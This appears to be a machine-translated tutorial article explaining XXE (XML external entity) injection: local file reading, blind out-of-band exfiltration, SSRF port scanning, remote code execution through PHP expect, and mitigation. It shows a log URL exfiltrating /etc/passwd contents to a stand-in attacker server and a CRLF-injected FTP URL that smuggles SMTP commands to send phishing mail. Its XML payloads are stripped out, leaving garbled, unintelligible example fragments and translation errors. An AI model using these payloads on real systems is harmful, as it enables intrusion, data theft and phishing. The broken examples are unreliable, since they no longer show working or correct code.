Shulou(Shulou.com)05/31 Report--

In this article Xiaobian introduces in detail "what is the method from XML to remote code execution", the content is detailed, the steps are clear, and the details are handled properly. I hope this article "what is the method from XML to remote code execution" can help you solve your doubts.

What is XXE?

Simply put, XXE is XML external entity injection. When external entities are allowed to be referenced, malicious content may lead to arbitrary file reading, system command execution, intranet port detection, attack intranet websites and other hazards.

For example, if your current program is PHP, you can set libxml_disable_entity_loader to TRUE to disable external entities for defensive purposes.

Basic utilization

Usually the attacker will inject payload into the XML file. Once the file is executed, it will read the local file on the server and initiate access to the internal network to scan the internal network port. In other words, XXE is a way to reach various services locally. In addition, to some extent, this may also help attackers bypass firewall rule filtering or authentication checks.

The following is an example of a simple XML code POST request:

POST / vulnerable HTTP/1.1Host: www.test.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Referer: https://test.com/test.htmlContent-Type: application/xmlContent-Length: 294Cookie: mycookie=cookies Connection: closeUpgrade-Insecure-Requests: 1 John, Doe I love XML Computers 9.99 2018-10-01 XML is the best!

After that, the above code will be parsed by the server's XML processor. The code is interpreted and returns: {"Request Successful": "Added!"}

Now, what happens when an attacker tries to abuse XML code parsing? Let's edit the code and include our malicious payload:

John, Doe I love XML Computers 9.99 2018-10-01 & ampxxe

The code is interpreted and returns:

{"error": "no results for description root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/sync...Blind OOB XXE"

As shown in the example above, the server returns the contents of the / etc/passwd file to our XXE in response. In some cases, however, no response is returned to the attacker's browser or agent, even if a XXE may exist on the server. In this case, we can use the Blind XXE vulnerability to build an out-of-band data (OOB) channel to read data. Although we cannot view the contents of the file directly, we can still use vulnerable servers as proxies to perform scans and code on external networks.

Scenario 1-Port scan

In the first example, we directed the request to the / etc/passwd file through URI and finally succeeded in returning the contents of the file for us. In addition, we can use http URI and force the server to send GET requests to our specified endpoints and ports, converting XXE to SSRF (server-side request forgery).

The following code will attempt to communicate with port 8080, and based on the response time / length, the attacker will be able to determine whether the port has been opened.

John, Doe I love XML Computers 9.99 2018-10-01 & ampxxe; scenario 2-stealing files through DTD

External document type definition (DTD) files can be used to trigger OOB XXE. The attacker hosts the .dtd file on VPS, causing the remote vulnerable server to obtain the file and execute malicious commands in it.

The following request will be sent to the application to demonstrate and test the method:

John, Doe I love XML Computers 9.99 2018-10-01 & ampxxe

Once the above code is processed by a vulnerable server, it sends a request to our remote server to find the DTD file that contains our payload:

% all

Let's take a moment to understand the execution process of the above request. The result is that two requests are sent to our server, and the second request is the contents of the / etc/passwd file.

In our VPS log we can see the second request with the contents of the file, thus confirming the existence of the OOB XXE vulnerability:

Http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh scenario 3-remote code execution

This rarely happens, but in some cases attackers are able to execute code through XXE, mainly due to improper configuration / development of internal applications. If we are lucky enough and the PHP expect module is loaded on a vulnerable system or on an internal application that processes XML, then we can execute the following command:

] > John, Doe I love XML Computers 9.99 2018-10-01 & ampxxe

Response:

{"error": "no results for description uid=0 (root) gid=0 (root) groups=0 (root)... scene 4-fishing

We used Java's XML parser to find a vulnerable endpoint. After scanning the internal port, we found a SMTP service listening on port 25, and Java supports ftp URI in sun.net.ftp.impl.FtpClient. Therefore, we can specify the user name and password, for example, the ftp://user:password@host:port/test.txt dint FTP client will send the corresponding USER command on the connection.

But if we add% 0D%0A (CRLF) anywhere in the user part of URL, we can terminate the USER command and inject a new command into the FTP session that allows us to send arbitrary SMTP commands to port 25:

Ftp://a%0D%0AEHLO%20a%0D%0AMAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0ARCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0ADATA%0D%0AFrom%3A%20support%40VULNERABLESYSTEM.com%0ATo%3A%20victim%40gmail.com%0ASubject%3A%20test%0A%0Atest!%0A%0D%0A.%0D%0AQUIT%0D%0A:a@VULNERABLESYSTEM.com:25

When the FTP client uses this URL connection, the following command is sent to the mail server on VULNERABLESYSTEM.com:

Ftp://aEHLO aMAIL FROM: RCPT TO: DATAFrom: support@VULNERABLESYSTEM.comTo: victim@gmail.comSubject: Reset your passwordWe need to confirm your identity. Confirm your password here: http://PHISHING_URL.com.QUIT:support@VULNERABLESYSTEM.com:25

This means that attackers can send phishing messages (for example, account reset links) from trusted sources and bypass spam filter detection. In addition to links, even we can send attachments.

Utility tool

Being able to edit web requests manually is critical to XXE attacks, and I recommend you use BurpSuite here. The scanning function of BurpSuite can detect potential XXE vulnerabilities for us. Secondly, the Intruder function of burp is very suitable for port detection. But it should be reminded that tools are only our assistance, and manual testing may work better in some cases!

HTTP request analysis tools like RequestBin and HookBin are well suited for OOB XXE testing. In addition, BurpSuite Pro's Collaborator is a good choice, but some security researchers prefer to use their own VPS.

Mitigation measures

The main problem discussed above is that the XML parser parses the untrusted data sent by the user. However, it is not easy and impossible to validate the data defined by the SYSTEM identifier in DTD (document type definition). Most XML parsers are vulnerable to XXE attacks by default. Therefore, the best solution is to configure the XML processor to use the local static DTD and not allow any self-declared DTD in the XML.

After reading this, the article "what is the method from XML to remote code execution" has been introduced. If you want to master the knowledge of this article, you still need to practice and use it. If you want to know more about the article, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.